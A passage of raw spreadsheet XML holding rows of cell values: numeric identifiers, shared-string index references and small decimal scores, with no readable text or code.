      <c r="A17887" s="1">
        <v>22088.0</v>
      </c>
      <c r="B17887" s="2">
        <v>3.0761877E7</v>
      </c>
      <c r="C17887" s="2" t="s">
        <v>17249</v>
      </c>
      <c r="D17887" s="2">
        <v>1.0</v>
      </c>
      <c r="E17887" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17887" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17888" ht="15.75" customHeight="1">
      <c r="A17888" s="1">
        <v>22514.0</v>
      </c>
      <c r="B17888" s="2">
        <v>3.754252E7</v>
      </c>
      <c r="C17888" s="2" t="s">
        <v>17250</v>
      </c>
      <c r="D17888" s="2">
        <v>1.0</v>
      </c>
      <c r="E17888" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17888" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17889" ht="15.75" customHeight="1">
      <c r="A17889" s="1">
        <v>22526.0</v>
      </c>
      <c r="B17889" s="2">
        <v>3.7729339E7</v>
      </c>
      <c r="C17889" s="2" t="s">
        <v>17251</v>
      </c>
      <c r="D17889" s="2">
        <v>1.0</v>
      </c>
      <c r="E17889" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17889" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17890" ht="15.75" customHeight="1">
      <c r="A17890" s="1">
        <v>22845.0</v>
      </c>
      <c r="B17890" s="2">
        <v>4.6779668E7</v>
      </c>
      <c r="C17890" s="2" t="s">
        <v>17252</v>
      </c>
      <c r="D17890" s="2">
        <v>1.0</v>
      </c>
      <c r="E17890" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17890" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17891" ht="15.75" customHeight="1">
      <c r="A17891" s="1">
        <v>22850.0</v>
      </c>
      <c r="B17891" s="2">
        <v>4.6843591E7</v>
      </c>
      <c r="C17891" s="2" t="s">
        <v>17253</v>
      </c>
      <c r="D17891" s="2">
        <v>1.0</v>
      </c>
      <c r="E17891" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17891" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17892" ht="15.75" customHeight="1">
      <c r="A17892" s="1">
        <v>23331.0</v>
      </c>
      <c r="B17892" s="2">
        <v>5.4639759E7</v>
      </c>
      <c r="C17892" s="2" t="s">
        <v>17254</v>
      </c>
      <c r="D17892" s="2">
        <v>1.0</v>
      </c>
      <c r="E17892" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17892" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17893" ht="15.75" customHeight="1">
      <c r="A17893" s="1">
        <v>23516.0</v>
      </c>
      <c r="B17893" s="2">
        <v>5840028.0</v>
      </c>
      <c r="C17893" s="2" t="s">
        <v>17255</v>
      </c>
      <c r="D17893" s="2">
        <v>1.0</v>
      </c>
      <c r="E17893" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17893" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17894" ht="15.75" customHeight="1">
      <c r="A17894" s="1">
        <v>23692.0</v>
      </c>
      <c r="B17894" s="2">
        <v>7060460.0</v>
      </c>
      <c r="C17894" s="2" t="s">
        <v>17256</v>
      </c>
      <c r="D17894" s="2">
        <v>1.0</v>
      </c>
      <c r="E17894" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17894" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17895" ht="15.75" customHeight="1">
      <c r="A17895" s="1">
        <v>23808.0</v>
      </c>
      <c r="B17895" s="2">
        <v>7883604.0</v>
      </c>
      <c r="C17895" s="2" t="s">
        <v>17257</v>
      </c>
      <c r="D17895" s="2">
        <v>1.0</v>
      </c>
      <c r="E17895" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17895" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17896" ht="15.75" customHeight="1">
      <c r="A17896" s="1">
        <v>23809.0</v>
      </c>
      <c r="B17896" s="2">
        <v>7883639.0</v>
      </c>
      <c r="C17896" s="2" t="s">
        <v>17257</v>
      </c>
      <c r="D17896" s="2">
        <v>1.0</v>
      </c>
      <c r="E17896" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17896" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17897" ht="15.75" customHeight="1">
      <c r="A17897" s="1">
        <v>24488.0</v>
      </c>
      <c r="B17897" s="2">
        <v>1.1068629E7</v>
      </c>
      <c r="C17897" s="2" t="s">
        <v>17258</v>
      </c>
      <c r="D17897" s="2">
        <v>1.0</v>
      </c>
      <c r="E17897" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17897" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17898" ht="15.75" customHeight="1">
      <c r="A17898" s="1">
        <v>24939.0</v>
      </c>
      <c r="B17898" s="2">
        <v>1.2491497E7</v>
      </c>
      <c r="C17898" s="2" t="s">
        <v>17259</v>
      </c>
      <c r="D17898" s="2">
        <v>1.0</v>
      </c>
      <c r="E17898" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17898" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17899" ht="15.75" customHeight="1">
      <c r="A17899" s="1">
        <v>24952.0</v>
      </c>
      <c r="B17899" s="2">
        <v>1.2563536E7</v>
      </c>
      <c r="C17899" s="2" t="s">
        <v>17260</v>
      </c>
      <c r="D17899" s="2">
        <v>1.0</v>
      </c>
      <c r="E17899" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17899" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17900" ht="15.75" customHeight="1">
      <c r="A17900" s="1">
        <v>25163.0</v>
      </c>
      <c r="B17900" s="2">
        <v>1.3075093E7</v>
      </c>
      <c r="C17900" s="2" t="s">
        <v>17261</v>
      </c>
      <c r="D17900" s="2">
        <v>1.0</v>
      </c>
      <c r="E17900" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17900" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17901" ht="15.75" customHeight="1">
      <c r="A17901" s="1">
        <v>25211.0</v>
      </c>
      <c r="B17901" s="2">
        <v>1.3228293E7</v>
      </c>
      <c r="C17901" s="2" t="s">
        <v>17262</v>
      </c>
      <c r="D17901" s="2">
        <v>1.0</v>
      </c>
      <c r="E17901" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17901" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17902" ht="15.75" customHeight="1">
      <c r="A17902" s="1">
        <v>25497.0</v>
      </c>
      <c r="B17902" s="2">
        <v>1.4086753E7</v>
      </c>
      <c r="C17902" s="2" t="s">
        <v>17263</v>
      </c>
      <c r="D17902" s="2">
        <v>1.0</v>
      </c>
      <c r="E17902" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17902" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17903" ht="15.75" customHeight="1">
      <c r="A17903" s="1">
        <v>25706.0</v>
      </c>
      <c r="B17903" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17903" s="2" t="s">
        <v>17264</v>
      </c>
      <c r="D17903" s="2">
        <v>1.0</v>
      </c>
      <c r="E17903" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17903" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17904" ht="15.75" customHeight="1">
      <c r="A17904" s="1">
        <v>25707.0</v>
      </c>
      <c r="B17904" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17904" s="2" t="s">
        <v>17265</v>
      </c>
      <c r="D17904" s="2">
        <v>1.0</v>
      </c>
      <c r="E17904" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17904" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17905" ht="15.75" customHeight="1">
      <c r="A17905" s="1">
        <v>25991.0</v>
      </c>
      <c r="B17905" s="2">
        <v>1.5330105E7</v>
      </c>
      <c r="C17905" s="2" t="s">
        <v>17266</v>
      </c>
      <c r="D17905" s="2">
        <v>1.0</v>
      </c>
      <c r="E17905" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17905" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17906" ht="15.75" customHeight="1">
      <c r="A17906" s="1">
        <v>25998.0</v>
      </c>
      <c r="B17906" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C17906" s="2" t="s">
        <v>17267</v>
      </c>
      <c r="D17906" s="2">
        <v>1.0</v>
      </c>
      <c r="E17906" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17906" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17907" ht="15.75" customHeight="1">
      <c r="A17907" s="1">
        <v>26150.0</v>
      </c>
      <c r="B17907" s="2">
        <v>1.6081449E7</v>
      </c>
      <c r="C17907" s="2" t="s">
        <v>17268</v>
      </c>
      <c r="D17907" s="2">
        <v>1.0</v>
      </c>
      <c r="E17907" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17907" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17908" ht="15.75" customHeight="1">
      <c r="A17908" s="1">
        <v>26166.0</v>
      </c>
      <c r="B17908" s="2">
        <v>1.6097964E7</v>
      </c>
      <c r="C17908" s="2" t="s">
        <v>17269</v>
      </c>
      <c r="D17908" s="2">
        <v>1.0</v>
      </c>
      <c r="E17908" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17908" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17909" ht="15.75" customHeight="1">
      <c r="A17909" s="1">
        <v>26260.0</v>
      </c>
      <c r="B17909" s="2">
        <v>1.6374934E7</v>
      </c>
      <c r="C17909" s="2" t="s">
        <v>17243</v>
      </c>
      <c r="D17909" s="2">
        <v>1.0</v>
      </c>
      <c r="E17909" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17909" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17910" ht="15.75" customHeight="1">
      <c r="A17910" s="1">
        <v>26324.0</v>
      </c>
      <c r="B17910" s="2">
        <v>1.6675574E7</v>
      </c>
      <c r="C17910" s="2" t="s">
        <v>17124</v>
      </c>
      <c r="D17910" s="2">
        <v>1.0</v>
      </c>
      <c r="E17910" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17910" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17911" ht="15.75" customHeight="1">
      <c r="A17911" s="1">
        <v>26581.0</v>
      </c>
      <c r="B17911" s="2">
        <v>1.7939518E7</v>
      </c>
      <c r="C17911" s="2" t="s">
        <v>17270</v>
      </c>
      <c r="D17911" s="2">
        <v>1.0</v>
      </c>
      <c r="E17911" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17911" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17912" ht="15.75" customHeight="1">
      <c r="A17912" s="1">
        <v>26617.0</v>
      </c>
      <c r="B17912" s="2">
        <v>1.8022026E7</v>
      </c>
      <c r="C17912" s="2" t="s">
        <v>17271</v>
      </c>
      <c r="D17912" s="2">
        <v>1.0</v>
      </c>
      <c r="E17912" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17912" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17913" ht="15.75" customHeight="1">
      <c r="A17913" s="1">
        <v>27145.0</v>
      </c>
      <c r="B17913" s="2">
        <v>2.0769133E7</v>
      </c>
      <c r="C17913" s="2" t="s">
        <v>17244</v>
      </c>
      <c r="D17913" s="2">
        <v>1.0</v>
      </c>
      <c r="E17913" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17913" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17914" ht="15.75" customHeight="1">
      <c r="A17914" s="1">
        <v>27315.0</v>
      </c>
      <c r="B17914" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C17914" s="2" t="s">
        <v>17272</v>
      </c>
      <c r="D17914" s="2">
        <v>1.0</v>
      </c>
      <c r="E17914" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17914" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17915" ht="15.75" customHeight="1">
      <c r="A17915" s="1">
        <v>27345.0</v>
      </c>
      <c r="B17915" s="2">
        <v>2.1459934E7</v>
      </c>
      <c r="C17915" s="2" t="s">
        <v>17273</v>
      </c>
      <c r="D17915" s="2">
        <v>1.0</v>
      </c>
      <c r="E17915" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17915" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17916" ht="15.75" customHeight="1">
      <c r="A17916" s="1">
        <v>27568.0</v>
      </c>
      <c r="B17916" s="2">
        <v>2.2427935E7</v>
      </c>
      <c r="C17916" s="2" t="s">
        <v>17274</v>
      </c>
      <c r="D17916" s="2">
        <v>1.0</v>
      </c>
      <c r="E17916" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17916" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17917" ht="15.75" customHeight="1">
      <c r="A17917" s="1">
        <v>27571.0</v>
      </c>
      <c r="B17917" s="2">
        <v>2.2434626E7</v>
      </c>
      <c r="C17917" s="2" t="s">
        <v>17274</v>
      </c>
      <c r="D17917" s="2">
        <v>1.0</v>
      </c>
      <c r="E17917" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17917" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17918" ht="15.75" customHeight="1">
      <c r="A17918" s="1">
        <v>27618.0</v>
      </c>
      <c r="B17918" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C17918" s="2" t="s">
        <v>17275</v>
      </c>
      <c r="D17918" s="2">
        <v>1.0</v>
      </c>
      <c r="E17918" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17918" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17919" ht="15.75" customHeight="1">
      <c r="A17919" s="1">
        <v>27792.0</v>
      </c>
      <c r="B17919" s="2">
        <v>2.3137593E7</v>
      </c>
      <c r="C17919" s="2" t="s">
        <v>17246</v>
      </c>
      <c r="D17919" s="2">
        <v>1.0</v>
      </c>
      <c r="E17919" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17919" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17920" ht="15.75" customHeight="1">
      <c r="A17920" s="1">
        <v>27944.0</v>
      </c>
      <c r="B17920" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C17920" s="2" t="s">
        <v>17276</v>
      </c>
      <c r="D17920" s="2">
        <v>1.0</v>
      </c>
      <c r="E17920" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17920" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17921" ht="15.75" customHeight="1">
      <c r="A17921" s="1">
        <v>28344.0</v>
      </c>
      <c r="B17921" s="2">
        <v>2.5923903E7</v>
      </c>
      <c r="C17921" s="2" t="s">
        <v>17248</v>
      </c>
      <c r="D17921" s="2">
        <v>1.0</v>
      </c>
      <c r="E17921" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17921" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17922" ht="15.75" customHeight="1">
      <c r="A17922" s="1">
        <v>28477.0</v>
      </c>
      <c r="B17922" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C17922" s="2" t="s">
        <v>17277</v>
      </c>
      <c r="D17922" s="2">
        <v>1.0</v>
      </c>
      <c r="E17922" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17922" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17923" ht="15.75" customHeight="1">
      <c r="A17923" s="1">
        <v>28481.0</v>
      </c>
      <c r="B17923" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C17923" s="2" t="s">
        <v>17278</v>
      </c>
      <c r="D17923" s="2">
        <v>1.0</v>
      </c>
      <c r="E17923" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17923" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17924" ht="15.75" customHeight="1">
      <c r="A17924" s="1">
        <v>29248.0</v>
      </c>
      <c r="B17924" s="2">
        <v>3.0858431E7</v>
      </c>
      <c r="C17924" s="2" t="s">
        <v>17279</v>
      </c>
      <c r="D17924" s="2">
        <v>1.0</v>
      </c>
      <c r="E17924" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17924" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17925" ht="15.75" customHeight="1">
      <c r="A17925" s="1">
        <v>29759.0</v>
      </c>
      <c r="B17925" s="2">
        <v>3.4815234E7</v>
      </c>
      <c r="C17925" s="2" t="s">
        <v>17280</v>
      </c>
      <c r="D17925" s="2">
        <v>1.0</v>
      </c>
      <c r="E17925" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17925" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17926" ht="15.75" customHeight="1">
      <c r="A17926" s="1">
        <v>29972.0</v>
      </c>
      <c r="B17926" s="2">
        <v>3609250.0</v>
      </c>
      <c r="C17926" s="2" t="s">
        <v>17281</v>
      </c>
      <c r="D17926" s="2">
        <v>1.0</v>
      </c>
      <c r="E17926" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17926" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17927" ht="15.75" customHeight="1">
      <c r="A17927" s="1">
        <v>30109.0</v>
      </c>
      <c r="B17927" s="2">
        <v>3.6697854E7</v>
      </c>
      <c r="C17927" s="2" t="s">
        <v>17282</v>
      </c>
      <c r="D17927" s="2">
        <v>1.0</v>
      </c>
      <c r="E17927" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17927" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17928" ht="15.75" customHeight="1">
      <c r="A17928" s="1">
        <v>30223.0</v>
      </c>
      <c r="B17928" s="2">
        <v>3.7402448E7</v>
      </c>
      <c r="C17928" s="2" t="s">
        <v>17283</v>
      </c>
      <c r="D17928" s="2">
        <v>1.0</v>
      </c>
      <c r="E17928" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17928" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17929" ht="15.75" customHeight="1">
      <c r="A17929" s="1">
        <v>30241.0</v>
      </c>
      <c r="B17929" s="2">
        <v>3.7542519E7</v>
      </c>
      <c r="C17929" s="2" t="s">
        <v>17250</v>
      </c>
      <c r="D17929" s="2">
        <v>1.0</v>
      </c>
      <c r="E17929" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17929" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17930" ht="15.75" customHeight="1">
      <c r="A17930" s="1">
        <v>30905.0</v>
      </c>
      <c r="B17930" s="2">
        <v>4.6779667E7</v>
      </c>
      <c r="C17930" s="2" t="s">
        <v>17284</v>
      </c>
      <c r="D17930" s="2">
        <v>1.0</v>
      </c>
      <c r="E17930" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17930" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17931" ht="15.75" customHeight="1">
      <c r="A17931" s="1">
        <v>31590.0</v>
      </c>
      <c r="B17931" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C17931" s="2" t="s">
        <v>17285</v>
      </c>
      <c r="D17931" s="2">
        <v>1.0</v>
      </c>
      <c r="E17931" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17931" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17932" ht="15.75" customHeight="1">
      <c r="A17932" s="1">
        <v>31615.0</v>
      </c>
      <c r="B17932" s="2">
        <v>5143743.0</v>
      </c>
      <c r="C17932" s="2" t="s">
        <v>17286</v>
      </c>
      <c r="D17932" s="2">
        <v>1.0</v>
      </c>
      <c r="E17932" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17932" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17933" ht="15.75" customHeight="1">
      <c r="A17933" s="1">
        <v>31746.0</v>
      </c>
      <c r="B17933" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17933" s="2" t="s">
        <v>17287</v>
      </c>
      <c r="D17933" s="2">
        <v>1.0</v>
      </c>
      <c r="E17933" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17933" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17934" ht="15.75" customHeight="1">
      <c r="A17934" s="1">
        <v>32176.0</v>
      </c>
      <c r="B17934" s="2">
        <v>5.4639758E7</v>
      </c>
      <c r="C17934" s="2" t="s">
        <v>17254</v>
      </c>
      <c r="D17934" s="2">
        <v>1.0</v>
      </c>
      <c r="E17934" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17934" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17935" ht="15.75" customHeight="1">
      <c r="A17935" s="1">
        <v>32513.0</v>
      </c>
      <c r="B17935" s="2">
        <v>5716250.0</v>
      </c>
      <c r="C17935" s="2" t="s">
        <v>17288</v>
      </c>
      <c r="D17935" s="2">
        <v>1.0</v>
      </c>
      <c r="E17935" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17935" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17936" ht="15.75" customHeight="1">
      <c r="A17936" s="1">
        <v>32901.0</v>
      </c>
      <c r="B17936" s="2">
        <v>6395523.0</v>
      </c>
      <c r="C17936" s="2" t="s">
        <v>17289</v>
      </c>
      <c r="D17936" s="2">
        <v>1.0</v>
      </c>
      <c r="E17936" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17936" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17937" ht="15.75" customHeight="1">
      <c r="A17937" s="1">
        <v>33100.0</v>
      </c>
      <c r="B17937" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17937" s="2" t="s">
        <v>17290</v>
      </c>
      <c r="D17937" s="2">
        <v>1.0</v>
      </c>
      <c r="E17937" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17937" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17938" ht="15.75" customHeight="1">
      <c r="A17938" s="1">
        <v>33107.0</v>
      </c>
      <c r="B17938" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17938" s="2" t="s">
        <v>17291</v>
      </c>
      <c r="D17938" s="2">
        <v>1.0</v>
      </c>
      <c r="E17938" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17938" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17939" ht="15.75" customHeight="1">
      <c r="A17939" s="1">
        <v>33133.0</v>
      </c>
      <c r="B17939" s="2">
        <v>7060459.0</v>
      </c>
      <c r="C17939" s="2" t="s">
        <v>17256</v>
      </c>
      <c r="D17939" s="2">
        <v>1.0</v>
      </c>
      <c r="E17939" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17939" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17940" ht="15.75" customHeight="1">
      <c r="A17940" s="1">
        <v>33560.0</v>
      </c>
      <c r="B17940" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C17940" s="2" t="s">
        <v>17292</v>
      </c>
      <c r="D17940" s="2">
        <v>1.0</v>
      </c>
      <c r="E17940" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17940" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17941" ht="15.75" customHeight="1">
      <c r="A17941" s="1">
        <v>33668.0</v>
      </c>
      <c r="B17941" s="2">
        <v>8420432.0</v>
      </c>
      <c r="C17941" s="2" t="s">
        <v>17293</v>
      </c>
      <c r="D17941" s="2">
        <v>1.0</v>
      </c>
      <c r="E17941" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17941" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17942" ht="15.75" customHeight="1">
      <c r="A17942" s="1">
        <v>33832.0</v>
      </c>
      <c r="B17942" s="2">
        <v>8962300.0</v>
      </c>
      <c r="C17942" s="2" t="s">
        <v>17294</v>
      </c>
      <c r="D17942" s="2">
        <v>1.0</v>
      </c>
      <c r="E17942" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17942" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17943" ht="15.75" customHeight="1">
      <c r="A17943" s="1">
        <v>33834.0</v>
      </c>
      <c r="B17943" s="2">
        <v>8985564.0</v>
      </c>
      <c r="C17943" s="2" t="s">
        <v>17295</v>
      </c>
      <c r="D17943" s="2">
        <v>1.0</v>
      </c>
      <c r="E17943" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17943" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17944" ht="15.75" customHeight="1">
      <c r="A17944" s="1">
        <v>33896.0</v>
      </c>
      <c r="B17944" s="2">
        <v>9196814.0</v>
      </c>
      <c r="C17944" s="2" t="s">
        <v>17296</v>
      </c>
      <c r="D17944" s="2">
        <v>1.0</v>
      </c>
      <c r="E17944" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17944" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17945" ht="15.75" customHeight="1">
      <c r="A17945" s="1">
        <v>34161.0</v>
      </c>
      <c r="B17945" s="2">
        <v>9894661.0</v>
      </c>
      <c r="C17945" s="2" t="s">
        <v>17297</v>
      </c>
      <c r="D17945" s="2">
        <v>1.0</v>
      </c>
      <c r="E17945" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17945" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17946" ht="15.75" customHeight="1">
      <c r="A17946" s="1">
        <v>34166.0</v>
      </c>
      <c r="B17946" s="2">
        <v>9915754.0</v>
      </c>
      <c r="C17946" s="2" t="s">
        <v>17298</v>
      </c>
      <c r="D17946" s="2">
        <v>1.0</v>
      </c>
      <c r="E17946" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17946" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="17947" ht="15.75" customHeight="1">
      <c r="A17947" s="1">
        <v>10872.0</v>
      </c>
      <c r="B17947" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C17947" s="2" t="s">
        <v>17299</v>
      </c>
      <c r="D17947" s="2">
        <v>1.0</v>
      </c>
      <c r="E17947" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17947" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17948" ht="15.75" customHeight="1">
      <c r="A17948" s="1">
        <v>16936.0</v>
      </c>
      <c r="B17948" s="2">
        <v>4.817738E7</v>
      </c>
      <c r="C17948" s="2" t="s">
        <v>17300</v>
      </c>
      <c r="D17948" s="2">
        <v>1.0</v>
      </c>
      <c r="E17948" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17948" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17949" ht="15.75" customHeight="1">
      <c r="A17949" s="1">
        <v>21546.0</v>
      </c>
      <c r="B17949" s="2">
        <v>2.3552087E7</v>
      </c>
      <c r="C17949" s="2" t="s">
        <v>17301</v>
      </c>
      <c r="D17949" s="2">
        <v>1.0</v>
      </c>
      <c r="E17949" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17949" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17950" ht="15.75" customHeight="1">
      <c r="A17950" s="1">
        <v>23542.0</v>
      </c>
      <c r="B17950" s="2">
        <v>5984824.0</v>
      </c>
      <c r="C17950" s="2" t="s">
        <v>17302</v>
      </c>
      <c r="D17950" s="2">
        <v>1.0</v>
      </c>
      <c r="E17950" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17950" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17951" ht="15.75" customHeight="1">
      <c r="A17951" s="1">
        <v>25014.0</v>
      </c>
      <c r="B17951" s="2">
        <v>1.2780157E7</v>
      </c>
      <c r="C17951" s="2" t="s">
        <v>17303</v>
      </c>
      <c r="D17951" s="2">
        <v>1.0</v>
      </c>
      <c r="E17951" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17951" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17952" ht="15.75" customHeight="1">
      <c r="A17952" s="1">
        <v>25666.0</v>
      </c>
      <c r="B17952" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C17952" s="2" t="s">
        <v>17304</v>
      </c>
      <c r="D17952" s="2">
        <v>1.0</v>
      </c>
      <c r="E17952" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17952" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17953" ht="15.75" customHeight="1">
      <c r="A17953" s="1">
        <v>29180.0</v>
      </c>
      <c r="B17953" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C17953" s="2" t="s">
        <v>17305</v>
      </c>
      <c r="D17953" s="2">
        <v>1.0</v>
      </c>
      <c r="E17953" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17953" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="17954" ht="15.75" customHeight="1">
      <c r="A17954" s="1">
        <v>16450.0</v>
      </c>
